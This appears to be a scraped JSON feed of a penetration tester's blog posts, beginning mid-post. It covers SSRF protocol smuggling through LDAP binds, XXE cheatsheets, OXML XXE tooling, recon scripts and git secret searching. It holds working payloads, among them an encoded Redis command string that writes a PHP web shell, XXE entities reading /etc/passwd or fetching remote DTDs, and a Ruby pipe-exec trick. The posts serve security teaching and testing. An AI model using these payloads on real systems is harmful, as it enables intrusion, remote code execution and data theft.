gopher://127.0.0.1:25/%0D%0AHELO%20localhost%0D%0AMAIL%20FROM%3Abadguy@evil.com%0D%0ARCPT%20TO%3Avictim@site.com%0D%0ADATA%0D%0A .... An common example of using Gopher to protocol smuggle SMTP\nThe key point above is the use of the CRLF character (i.e. %0D%0A) which breaks up the commands of the second protocol. This attack is only possible with the ability to inject CRLF characters into a protocol.\nAlmost all LDAP client libraries support plaintext authentication or a non-ssl simple bind. For example, the following is an LDAP authentication example using Python 2.7 and the python-ldap library:\n1 2 3 import ldap conn = ldap.initialize(\u0026#34;ldap://[SERVER]:[PORT]\u0026#34;) conn.simple_bind_s(\u0026#34;[USERNAME]\u0026#34;, \u0026#34;[PASSWORD]\u0026#34;) Simple LDAP bind in Python\nIn many LDAP client libraries it is possible to insert a CRLF inside the username or password field. Because LDAP is a rather plain TCP protocol this makes it immediately noteworthy.\n1 2 3 import ldap conn = ldap.initialize(\u0026#34;ldap://0:9000\u0026#34;) conn.simple_bind_s(\u0026#34;1\\n2\\n\\3\\n\u0026#34;, \u0026#34;4\\n5\\n6---\u0026#34;) Injecting CRLF Characters in a LDAP Simple Bind\nYou can see the CRLF characters are sent in the request:\n1 2 3 4 5 6 7 8 9 # nc -lvp 9000 listening on [::]:9000 ... connect to [::ffff:127.0.0.1]:9000 from localhost:39250 ([::ffff:127.0.0.1]:39250) 0`1 2 3 4 5 6--- Viewing the Result\nReal World Example Imagine the case where the user can control the server and the port. This is very common in LDAP configuration settings. For example, there are many web applications that support LDAP configuration as a feature. Some common examples are embedded devices (e.g. webcam, routers), Multi-Function Printers, multi-tenancy environments, and enterprise appliances and applications.\nPutting It All Together If a user can control the server/port and CRLF can be injected into the username or password, this becomes an interesting SSRF protocol smuggle. For example, here is a Redis Remote Code Execution payload smuggled completely inside the password field of the LDAP authentication in a PHP application. In this case the web root is ā€˜/appā€™ and the Redis server would need to be able to write the web root:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 \u0026lt;?php $adServer = \u0026#34;ldap://127.0.0.1:6379\u0026#34;; $ldap = ldap_connect($adServer); # RCE smuggled in the password field $password = \u0026#34;_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%244%0D%0A/app%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A\u0026#34;; $ldaprdn = \u0026#39;domain\u0026#39; . \u0026#34;\\\\\u0026#34; . \u0026#34;1\\n2\\n3\\n\u0026#34;; ldap_set_option($ldap, LDAP_OPT_PROTOCOL_VERSION, 3); ldap_set_option($ldap, LDAP_OPT_REFERRALS, 0); $bind = @ldap_bind($ldap, $ldaprdn, urldecode($password)); ?\u0026gt; PHP with Redis exploit embedded in the bind\nClient Libraries In my opinion, the client library is functioning correctly by allowing these characters. Rather, itā€™s the applicationā€™s job to filter username and password input before passing it to an LDAP client library. I tested out four LDAP libraries that are packaged with common languages all of which allow CRLF in the username or password field:\nLibrary Tested In python-ldap Python 2.7 com.sun.jndi.ldap JDK 11 php-ldap PHP 7 net-ldap Ruby 2.5.2 Summary Points If you are an attacker and find an LDAP configuration page, check if the username or password field allows CRLF characters. Typically the initial test will involve sending the request to a listener that you control to verify these characters are not filtered. If you are defender, make sure your application is filtering CRLF characters (i.e. %0D%0A) ","date":"2019-02-06T00:00:00Z","image":"/images/2022/11/falcon3.png","permalink":"/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/","title":"SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP"},{"content":"I recently (May 2018) published odle which is a Ruby gem and binary that takes XML data from various security tools and outputs their JSON equivalent. The goal is to be (1) simple, (2) fast, and (3) work on many platforms with only one dependency ā€“ nokogiri.\nQuick Example of Piping Security Results\nBelow are two examples using odle to convert output from one tool (e.g. burpsuite) as input for something else (e.g. nmap scans). From the command line I typically use odle with gron which is an awesome tool that ā€œmakes json greppableā€ =).\nConvert Burp to nmap script scan Often I will take the passive data from one tool and feed it into another tool. One example is burp to something else; in this case, nmap script checks.\n1 2 3 4 5 6 7 8 cat burp-scan.xml | odle --burp | gron | grep -i \u0026#39;affected_hosts\u0026#39; | cut -d \\\u0026#34; -f4 | cut -d/ -f3 | cut -d\u0026#39; \u0026#39; -f1 | sort | uniq | xargs printf \u0026#34;nmap -sS -Pn -p 21 --script +ftp-anon %s \\n\u0026#34; nmap -sS -Pn -p 21 --script +ftp-anon apis.google.com nmap -sS -Pn -p 21 --script +ftp-anon developer.cdn.mozilla.net nmap -sS -Pn -p 21 --script +ftp-anon fakesite.com nmap -sS -Pn -p 21 --script +ftp-anon fonts.googleapis.com nmap -sS -Pn -p 21 --script +ftp-anon safebrowsing-cache.google.com nmap -sS -Pn -p 21 --script +ftp-anon safebrowsing.google.com Run nessus results through aquatone 1 2 3 4 5 cat nessus_v2.xml | odle --nessus | ~/Downloads/gron | grep -i \u0026#39;affected_hosts\u0026#39; | cut -d \\\u0026#34; -f4 | cut -d/ -f3 | cut -d\u0026#39; \u0026#39; -f1 | sort | uniq | xargs printf \u0026#34;aquatone --discover %s \\n\u0026#34; aquatone --discover admin.fb.com aquatone --discover js.fb.com aquatone --discover blah.fb.com Install 1 2 gem install nokogiri gem install odle Bugs I am sure there are plenty. Please submit an issue if you find one or if you would like to see other supported tools. I am also interested in inconsistencies between outputs, missing data, and other issues if you see them.\n","date":"2018-05-24T00:00:00Z","image":"/images/2022/11/falcon2.png","permalink":"/odle-piping-security-data/","title":"odle ruby gem: piping security data"},{"content":"Recently ColdFusion was shown vulnerable to XXE based attacks in OXML documents; CVE-2016-4264. The blog post linked gives an example building the file using python; cool!\nItā€™s easy to backdoor files in a similar fashion with OXML XXE. The fastest way to do this is using the ā€œOverwrite File inside DOCX/etcā€ function.\nYou can add any XLSX at this point, OXML_XXE ships with a sample.xlsx.\nYou will want to specify the XML file to overwrite; e.g. ā€œ[Content_Types.xml]ā€. The ā€œ_rels/.relsā€ file is another option.\nFinally add in the XML exploit. Below a Parameter Entity is used.\nClick ā€œBuildā€ to generate and download the file. To verify that the file is sound you can view the generated file in the ā€œList Previously Built Filesā€ menu option.\n","date":"2016-10-02T00:00:00Z","image":"/images/2022/11/robot2.png","permalink":"/exploiting-cve-2016-4264-with-oxml_xxe/","title":"Exploiting CVE-2016-4264 With OXML_XXE"},{"content":"Finding hosts or domain names associated with a company where the domain name does not include the name of the company can sometimes be difficult. There are common ways to do it such as ASN or scope information (e.g. bug bounty ToE or IP block).\nOne technique that I use (and I am guessing others do as well) is through an Organization field in a SSL Certificate that is shared by multiple domains. For example, a certificate from https://www.facebook.com and https://parse.com are signed by the same organization.\nNotice the Organization in the SSL Certificate and compare to the image below\nNotice the Organization in the SSL Certificate and compare to the image above\nThis is an easy example. Parse is listed on the Facebook Mergers or Acquisitions page (https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Facebook) and the FB bug bounty terms (https://www.facebook.com/whitehat).\nHowever, consider a more complex example like ā€œHackerOne: Subdomain takeover on https://fastly.sc-cdn.net/ā€.\nFirst, if you arenā€™t familiar with sub-domain take over this and this are awesome.\nIn the case above, the subdomain fastly.sc-cdn.net is owned by Snapchat which is not obvious from the domain name. Personally, I do not know how ebrietas found that domain. DNS Bruteforcing would work. It could also be done by shared SSL Certificates on the Organization name.\nA few months back I wrote a script that uses the Censys API to look for domains with the same Organization field in the SSL certificate.\nFor example:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ruby censys_cert_search.rb \u0026#39;Snapchat Inc.\u0026#39; Page: 1 {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;se.snap-dev.net\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;se.snap-dev.net\u0026#34;]} |+| Checking se.snap-dev.net se.snap-dev.net. 300 IN A 107.178.248.183 se.snap-dev.net. 300 IN A 107.178.248.183 |+| Checking se.snap-dev.net se.snap-dev.net. 300 IN A 107.178.248.183 se.snap-dev.net. 300 IN A 107.178.248.183 {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;spectre.sc-corp.net\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;spectre.sc-corp.net\u0026#34;]} |+| Checking spectre.sc-corp.net spectre.sc-corp.net. 300 IN A 130.211.14.254 spectre.sc-corp.net. 300 IN A 130.211.14.254 |+| Checking spectre.sc-corp.net spectre.sc-corp.net. 300 IN A 130.211.14.254 spectre.sc-corp.net. 300 IN A 130.211.14.254 ... If you checkout the code, the script is:\nUsing the Censys Certificate API to search on the Organization string matching ā€˜Snapchat Inc.ā€™ (i.e. O=Snapchat Inc.*) Parsing out the Common Name and Alternate Names from the SSL Certificate response Performing a DNS lookup for each name found You can also run the script to skip over common names that couldā€™ve been easily found in other ways (e.g. dev.snapchat.com). This focuses the effort on hard to find systems. Adding a third argument skips DNS lookup.\n1 2 3 4 5 6 7 8 9 10 11 12 13 ruby censys_cert_search.rb \u0026#39;Snapchat Inc.\u0026#39; \u0026#39;*snapchat.com\u0026#39; false Page: 1 {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;se.snap-dev.net\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;se.snap-dev.net\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;spectre.sc-corp.net\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;spectre.sc-corp.net\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;*.targeting.snapads.com\u0026#34;, \u0026#34;targeting.snapads.com\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;*.targeting.snapads.com\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;*.snapchat.com\u0026#34;, \u0026#34;snapchat.com\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;*.snapchat.com\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;rest-escluster.hydrasearch.sc-prod.net\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;rest-escluster.hydrasearch.sc-prod.net\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;*.snapchat.com\u0026#34;, \u0026#34;snapchat.com\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;*.snapchat.com\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;restfulgit.sc-corp.net\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;restfulgit.sc-corp.net\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;attribution.snapads.com\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;attribution.snapads.com\u0026#34;]} {\u0026#34;parsed.extensions.subject_alt_name.dns_names\u0026#34;=\u0026gt;[\u0026#34;*.snapchat.com\u0026#34;, \u0026#34;snapchat.com\u0026#34;, \u0026#34;mail.support.snapchat.com\u0026#34;], \u0026#34;parsed.subject.common_name\u0026#34;=\u0026gt;[\u0026#34;*.snapchat.com\u0026#34;]} .... As you can see not perfect but Iā€™ve found it really useful in the past. It was hack for something else and Iā€™ll update as time permits.\n","date":"2016-09-27T00:00:00Z","image":"/images/2022/11/beer2.png","permalink":"/finding-hosts-using-ssl-certificate-organization-and-censys/","title":"Finding Hosts Using SSL Certificate Organization And Censys"},{"content":"Just wanted to post some details from my BH USA 2015 briefing ā€œExploiting XXE In File Upload Functionalityā€.\nhttps://www.youtube.com/watch?v=LZUlw8hHp44\nI also gave an updated version of the presentation in November for the Blackhat Webcast Series. It included more file types; PDF, JPG, and GIF. The link is here: https://www.blackhat.com/html/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.html\n","date":"2016-05-01T00:00:00Z","image":"/images/2022/11/falcon4.png","permalink":"/exploiting-xxe-in-file-upload-functionality/","title":"Exploiting XXE In File Upload Functionality"},{"content":"I landed the SSRF Cloud Metadata technique in a few different scenarios recently. If you havenā€™t seen the talk BHUSA 2014 - Bringing a Machete to the Amazon I recommend it.\nTo make life a little easier created a living URL list for Metadata broken down by cloud. There are a few more than he discusses in the talk but still has work to go. Submit a PR if you see some missing.\nhttps://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb\n","date":"2016-03-28T00:00:00Z","image":"/images/2022/11/robot1.png","permalink":"/cloud-metadata-url-list/","title":"Cloud Metadata URL List"},{"content":"An XML Entity testing cheatsheet. This is an updated version with nokogiri tests removed, just (X)XE notes.\nXML Declaration(s):\n1 2 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; standalone=\u0026#34;no\u0026#34;?\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; standalone=\u0026#34;yes\u0026#34;?\u0026gt; Vanilla entity test:\n1 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY post \u0026#34;1\u0026#34;\u0026gt;]\u0026gt;\u0026lt;root\u0026gt;\u0026amp;post;\u0026lt;/root\u0026gt; SYSTEM entity test (xxe):\n1 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY post SYSTEM \u0026#34;file:///etc/passwd\u0026#34;\u0026gt;]\u0026gt; Parameter Entity. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:\n1 2 3 4 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY % dtd SYSTEM \u0026#34;http://[IP]/some.dtd\u0026#34;\u0026gt;%dtd]\u0026gt; Should be illegal per XML specs but I\u0026#39;ve seen it work, also useful for DoS: \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY % dtd SYSTEM \u0026#34;http://[IP]/some.dtd\u0026#34;\u0026gt;\u0026lt;!ENTITY % a \u0026#34;test %dtd\u0026#34;\u0026gt;]\u0026gt; Combined Entity and Parameter Entity:\n1 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY post SYSTEM \u0026#34;http://\u0026#34;\u0026gt;\u0026lt;!ENTITY % dtd SYSTEM \u0026#34;http://[IP]/some.dtd\u0026#34;\u0026gt;\u0026lt;!ENTITY % a \u0026#34;test %dtd\u0026#34;\u0026gt;]\u0026gt;\u0026lt;root\u0026gt;\u0026amp;post;\u0026lt;/root\u0026gt; URL handler. This follows XML Entity - IBM (Broken) I have not used this but Public DTD works just as well:\n1 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY c PUBLIC \u0026#34;-//W3C//TEXT copyright//EN\u0026#34; \u0026#34;http://[IP]/copyright.xml\u0026#34;\u0026gt;]\u0026gt; XML Schema Inline:\n1 2 \u0026lt;madeuptag xlmns=\u0026#34;http://[ip]\u0026#34; xsi:schemaLocation=\u0026#34;http://[IP]\u0026#34;\u0026gt; \u0026lt;/madeuptag\u0026gt; Remote Public DTD, from oxml_xxe payloads:\n1 \u0026lt;!DOCTYPE roottag PUBLIC \u0026#34;-//OXML/XXE/EN\u0026#34; \u0026#34;http://[IP]\u0026#34;\u0026gt; External XML Stylesheet, from Burp Suite Release Notes:\n1 \u0026lt;?xml-stylesheet type=\u0026#34;text/xml\u0026#34; href=\u0026#34;http://[IP]\u0026#34;?\u0026gt; XInclude:\n1 2 3 \u0026lt;document xmlns:xi=\u0026#34;http://\u0026lt;IP\u0026gt;/XInclude\u0026#34;\u0026gt;\u0026lt;footer\u0026gt;\u0026lt;xi:include href=\u0026#34;title.xml\u0026#34;/\u0026gt;\u0026lt;/footer\u0026gt;\u0026lt;/document\u0026gt; \u0026lt;root xmlns:xi=\u0026#34;http://www.w3.org/2001/XInclude\u0026#34;\u0026gt; \u0026lt;xi:include href=\u0026#34;file:///etc/fstab\u0026#34; parse=\u0026#34;text\u0026#34;/\u0026gt; Inline XSLT:\n1 2 3 4 5 6 7 8 \u0026lt;?xml-stylesheet type=\u0026#34;text/xml\u0026#34; href=\u0026#34;#mytest\u0026#34;?\u0026gt; \u0026lt;xsl:stylesheet id=\u0026#34;mytest\u0026#34; version=\u0026#34;1.0\u0026#34; xmlns:xsl=\u0026#34;http://www.w3.org/1999/XSL/Transform\u0026#34; xmlns:fo=\u0026#34;http://www.w3.org/1999/XSL/Format\u0026#34;\u0026gt; \u0026lt;!-- replace with your XSLT attacks --\u0026gt; \u0026lt;xsl:import href=\u0026#34;http://[ip]\u0026#34;/\u0026gt; \u0026lt;xsl:template match=\u0026#34;id(\u0026#39;boom\u0026#39;)\u0026#34;\u0026gt; \u0026lt;fo:block font-weight=\u0026#34;bold\u0026#34;\u0026gt;\u0026lt;xsl:apply-templates/\u0026gt;\u0026lt;/fo:block\u0026gt; \u0026lt;/xsl:template\u0026gt; \u0026lt;/xsl:stylesheet\u0026gt; Useful Links:\nXML Schema, DTD, and Entity Attacks - A Compendium of Known Techniques XML Entity Examples - IBM (Broken, check Internet Archive) ","date":"2015-12-24T00:00:00Z","image":"/images/2022/11/tree1.png","permalink":"/xml-entity-cheatsheet-updated/","title":"XML Entity Cheatsheet - Updated"},{"content":"Last month at Blackhat Arsenal 2015, Pete and I presented on Serpico. This was our second time at Arsenal. Yet again, awesome people, great venue, and overall a highlight for me of BH/DC/LV. We got some excellent feedback on the project, so thank you to anyone who stopped by.\nLast year I posted the top 3 feature requests and we squashed them (woot!). These are requested features/bugs this year and their associated issue on github:\nFix Image Breakage in Presentations Automated Presentation creation was added the week before and had a rather embarassing stack trace in certain combinations; this was fixed in this commit\nStatistics More than a few people asked for more correlation; ā€œSupport Findings Trendingā€ (Issue 25).\nWiki Additions Add the following information to the wiki:\nReport Creation Example Presentation Creation Export/Import Examples Submit To Kali Here is the submission: New Tool Request: SERPICO\n","date":"2015-09-10T00:00:00Z","image":"/images/2022/11/tree2.png","permalink":"/blackhat-2015-arsenal/","title":"Blackhat 2015 Arsenal"},{"content":"I was researching something else and thought this was a cool way to execute a command through the open method in ruby:\n1 open(\u0026#34;|[CMD]\u0026#34;) The key is starting the open with pipe. For example,\n1 open(\u0026#34;|ls\u0026#34;) Or to exec and print the result in one line:\n1 open(\u0026#34;|ls\u0026#34;).each {|out| puts out } Not sure where I saw it originally, but this is an interesting older read: https://devver.wordpress.com/2009/06/30/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-1/\n","date":"2015-04-14T00:00:00Z","image":"/images/2022/11/tree3.png","permalink":"/simple-ruby-exec-with-open-and-pipe/","title":"Simple Ruby Exec with Open and Pipe"},{"content":"OXML is a common document format; think docx (Microsoft Word Document), pptx (Microsoft Powerpoint), xlsx (Excel Spreadsheet), etc.\nAn OXML document is a zip file containing XML files and any media files. When the document is rendered, the rendering library unzips the document and then parses the containing XML files. The order the XML files are parsed and which files maintain precedence over the others is dependent on the type of document. The following link is from Microsoft on the XML structure in Office 2007 files: File format structure\nI have had success in the past embedding XML External Entities into the XML files of a docx, the XXE is exploited when the document is parsed. An easy example of this would be in file upload functionality that allows docx, pptx, or xlsx. Facebook was found vulnerable to this exact scenario in December 2014; XXE Bug Patched in Facebook.\nIf you review the Microsoft link posted earlier you will see that each XML file plays a different role. I have found varying levels of success in which XML file I embed the XXE exploit into. To help out with this testing process I wrote a tool:\nhttps://github.com/BuffaloWill/oxml_xxe\nKeeping with 300 words or less I will stop here and pick up with oxml_xxe usage in the next blog post.\n","date":"2015-03-04T00:00:00Z","image":"/images/2022/11/tree4.png","permalink":"/exploiting-xxe-vulnerabilities-in-oxml-documents-part-1/","title":"Exploiting XXE Vulnerabilities in OXML Documents - Part 1"},{"content":"I seem to find open LDAP servers on the Internet more often than I should. Here are some notes on using ldapsearch\nInstalling ldapsearch on Ubuntu 1 apt-get install ldap-utils Root-DSE object nmap includes a script to gather info from a LDAP root-dse object (http://nmap.org/nsedoc/scripts/ldap-rootdse.html). We can also use ldapsearch to test:\n1 ldapsearch -p [PORT] -x -b \u0026#34;\u0026#34; -s base \u0026#39;objectclass=*\u0026#39; -h [IP] Open LDAP server Connect to an open LDAP server, john the ripper can be used to crack passwords that are returned:\n1 ldapsearch -p [PORT] -x -h [IP] -b \u0026#34;dc=[y],dc=com\u0026#34; ","date":"2015-02-25T00:00:00Z","image":"/images/2022/11/monster1.png","permalink":"/ldapsearch-notes/","title":"ldapsearch notes"},{"content":"gumbler is a script I wrote to search through git commits and introduced in the blog post ā€œSearching Through Git Commitsā€. Recently I wanted to run Gumbler across all repositories for an organization, the steps are discussed below.\nFirst, we need to grab a list of repositories for the ORG. This can be done using the API\n1 2 3 curl \u0026#34;https://api.github.com/orgs/[ORG NAME]/repos?page=1\u0026amp;per_page=10000\u0026#34; \u0026gt; repos.json curl \u0026#34;https://api.github.com/orgs/[ORG NAME]/repos?page=2\u0026amp;per_page=10000\u0026#34; \u0026gt;\u0026gt; repos.json ... Note, the API limits the number of values returned so you will want to update the page count to make sure you get them all.\nNext we iterate through each repository, clone it, and run gumbler across the repo. A simple Ruby script is given below. Note, ignore any repos that were forked as they arenā€™t specific to the orgnization.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 require \u0026#39;json\u0026#39; # specify repos.json as an argument file = File.read(ARGV[0]) # parse the json data_hash = JSON.parse(file) # iterate each hash data_hash.each do |hash| # ignore forked repos if !(hash[\u0026#34;fork\u0026#34;]) puts \u0026#34;|+| Testing #{hash[\u0026#34;name\u0026#34;]}\u0026#34; # clone the project `git clone https://github.com/[ORG]/#{hash[\u0026#34;name\u0026#34;]}.git` # Gumbler requires full directory paths `ruby ~/gumbler/gumbler.rb -s -p #{hash[\u0026#34;name\u0026#34;]} ~/[ORG]/results/` sleep(3) end end ","date":"2015-01-09T00:00:00Z","image":"/images/2022/11/monster2.png","permalink":"/search-all-github-repositories-for-an-organization/","title":"Search all Github Repositories for an Organization"},{"content":"gumbler is a script I wrote to search through git commits. Examples from github are discussed below.\n.gitignore A gitignore file is used to specify files that should not be tracked by git (source gitignore). In the default case, gumbler will read the gitignore file for the project and search every revision for a case where a file from gitignore was committed. Possible use cases would be as a pen tester looking for reconnaisance data (e.g. developer usernames/passwords, staging hosts/services, etc.) or a developer to verify projects did not previously commit ā€œsecretā€ data.\nI am a big fan of what Netflix is doing with regards to open source and security. After looking through a number of their projects, I noticied Priam has a few commits with non-damaging files from the gitignore.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $. git clone https://github.com/Netflix/Priam.git Cloning into \u0026#39;Priam\u0026#39;... .... Checking connectivity... done. $. ruby gumbler/gumbler.rb Priam/ gumbler_testing/tmp/ |-| Jumping to remote @directory Priam/ |-| Storing every revision checking for *.com.. checking for *.class.. ..... |+| Looking for .classpath, Found it in BRANCH : 697fd66aae9beed107e13f49a741455f1d9d8dd9 .classpath. Storing it in gumbler_testing/tmp/. |+| Looking for .classpath, Found it in BRANCH : 47bdb537789c034493e94d8977eae77ecbfd5b24 .classpath. Storing it in gumbler_testing/tmp/. |+| Looking for .classpath, Found it in BRANCH : 442862d4a8d4d18d0e176ded8795dd45a24528fc .classpath. Storing it in gumbler_testing/tmp/. .... checking for .project.. |+| Looking for .project, Found it in BRANCH : 697fd66aae9beed107e13f49a741455f1d9d8dd9 .project. Storing it in gumbler_testing/tmp/. |+| Looking for .project, Found it in BRANCH : 0941d9e0e0dda3ee1d9d4dda757d59ffb641abcf .project. Storing it in gumbler_testing/tmp/. |+| Looking for .project, Found it in BRANCH : 47bdb537789c034493e94d8977eae77ecbfd5b24 .project. Storing it in gumbler_testing/tmp/. .... checking for .settings.. .... .classpath or .project are not damaging in this case and, hence, are used as the example. On a pen test or in collaborative projects I have found much worse (cough usernames, passwords). This shouldnā€™t be that surprising.\nSearching Commit Logs Another use case for gumbler is to look through commit history. Using Ruby on Rails as an example, we can search from for any commit with ā€œCVEā€ in it. Gumbler will output a diff from the files changed in the commit.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 $. ruby gumbler/gumbler.rb --grep CVE rails/ tmp/ |!| skipping .gitignore, searching commit log for CVE $. ls tmp/ 060c91cd59ab86583a8f2f52142960d3433f62f5-2012-05-30_15:13:03_-0700.diff 88cc1688d0cb828c17706b41a8bd27870f2a2beb-2013-01-08_12:11:18_-0800.diff 08d0a11a3f62718d601d39e617c834759cf59bbb-2014-02-18_15:38:50_-0300.diff 8be6913990c30f63618173da722148892348dcc9-2013-03-15_17:45:53_-0700.diff 0b58a7ff420d7ef4b643c521a62be7259dd2f5cb-2011-02-08_14:21:12_-0800.diff 8e577fe560d5756fcc67840ba304d79ada6804e4-2013-01-08_12:41:24_-0800.diff 0c7ac34aed1845044cd1911e5a775366d7ca41c1-2013-12-02_16:42:16_-0800.diff 9340f89849606dba02f44038171f3837f883fd4e-2012-05-30_15:09:13_-0700.diff 2392535f4085d88186097e3c23414e958fb1d16d-2013-03-18_10:17:32_-0700.diff 93fb4c1e62dc9605eecbfaffda2becc85890fa5f-2014-07-10_10:20:16_-0700.diff ... $. cat 060c91cd59ab86583a8f2f52142960d3433f62f5-2012-05-30_15\\:13\\:03_-0700.diff 060c91cd59ab86583a8f2f52142960d3433f62f5-2012-05-30 15:13:03 -0700==\u0026gt; 2012-05-30 15:13:03 -0700 Strip [nil] from parameters hash. Thanks to Ben Murphy for reporting this! Strip [nil] from parameters hash. Thanks to Ben Murphy for reporting this! CVE-2012-2660 :100644 100644 aa5ba3e... 6757a53... M actionpack/lib/action_dispatch/http/request.rb :100644 100644 c3f009a... 6ea66f9... M actionpack/test/dispatch/request/query_string_parsing_test.rb diff --git a/actionpack/lib/action_dispatch/http/request.rb b/actionpack/lib/action_dispatch/http/request.rb index aa5ba3e..6757a53 100644 --- a/actionpack/lib/action_dispatch/http/request.rb +++ b/actionpack/lib/action_dispatch/http/request.rb .... As the README says, be careful using the tool as it uses Command Execution to search. A malicious git project could take advantage of this. Ping me with better ways to handle this.\n","date":"2014-10-06T00:00:00Z","image":"/images/2022/11/monster3.png","permalink":"/searching-through-git-commits/","title":"Searching Through Git Commits"},{"content":"An XML Entity testing cheatsheet. Testing was done using an older vulnerable version of nokogiri. In IRB you can require previous versions of gems. Certain techniques (e.g. XInclude) may require additional settings in Nokogiri.\nXML Headers:\n1 2 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; standalone=\u0026#34;no\u0026#34;?\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; standalone=\u0026#34;yes\u0026#34;?\u0026gt; Vanilla entity test:\n1 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY post \u0026#34;1\u0026#34;\u0026gt;]\u0026gt;\u0026lt;root\u0026gt;\u0026amp;post;\u0026lt;/root\u0026gt; SYSTEM entity test (xxe):\n1 2 3 4 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY post SYSTEM \u0026#34;file:///etc/passwd\u0026#34;\u0026gt;]\u0026gt; e.g. doc = Nokogiri::XML(\u0026#34;\u0026lt;!DOCTYPE root [ \u0026lt;!ENTITY spl SYSTEM \\\u0026#34;file:///etc/passwd\\\u0026#34;\u0026gt; ]\u0026gt;\\n\u0026lt;a\u0026gt;\u0026amp;spl;\u0026lt;/a\u0026gt;\u0026#34;) doc.children.children.children.text Parameter Entity Test. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:\n1 2 3 4 5 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY % dtd SYSTEM \u0026#34;http://[IP]/some.dtd\u0026#34;\u0026gt;\u0026lt;!ENTITY % a \u0026#34;test %dtd\u0026#34;\u0026gt;]\u0026gt; e.g. options = Nokogiri::XML::ParseOptions::DTDATTR doc = Nokogiri::XML::Document.parse(\u0026#34;\u0026lt;!DOCTYPE test [\u0026lt;!ENTITY % dtd SYSTEM \\\u0026#34;http://172.16.122.177/student.dtd\\\u0026#34;\u0026gt;\u0026lt;!ENTITY % a \u0026#34;test %dtd\u0026#34;\u0026gt;]\u0026gt;\\n\u0026lt;test\u0026gt;success\u0026lt;/test\u0026gt;\u0026#34;, nil, nil, options) doc.children.text Combined Entity and Parameter Entity:\n1 \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY post SYSTEM \u0026#34;http://\u0026#34;\u0026gt;\u0026lt;!ENTITY % dtd SYSTEM \u0026#34;http://[IP]/some.dtd\u0026#34;\u0026gt;\u0026lt;!ENTITY % a \u0026#34;test %dtd\u0026#34;\u0026gt;]\u0026gt;\u0026lt;root\u0026gt;\u0026amp;post;\u0026lt;/root\u0026gt; XInclude:\n1 2 3 \u0026lt;document xmlns:xi=\u0026#34;http://\u0026lt;IP\u0026gt;/XInclude\u0026#34;\u0026gt;\u0026lt;footer\u0026gt;\u0026lt;xi:include href=\u0026#34;title.xml\u0026#34;/\u0026gt;\u0026lt;/footer\u0026gt;\u0026lt;/document\u0026gt; \u0026lt;root 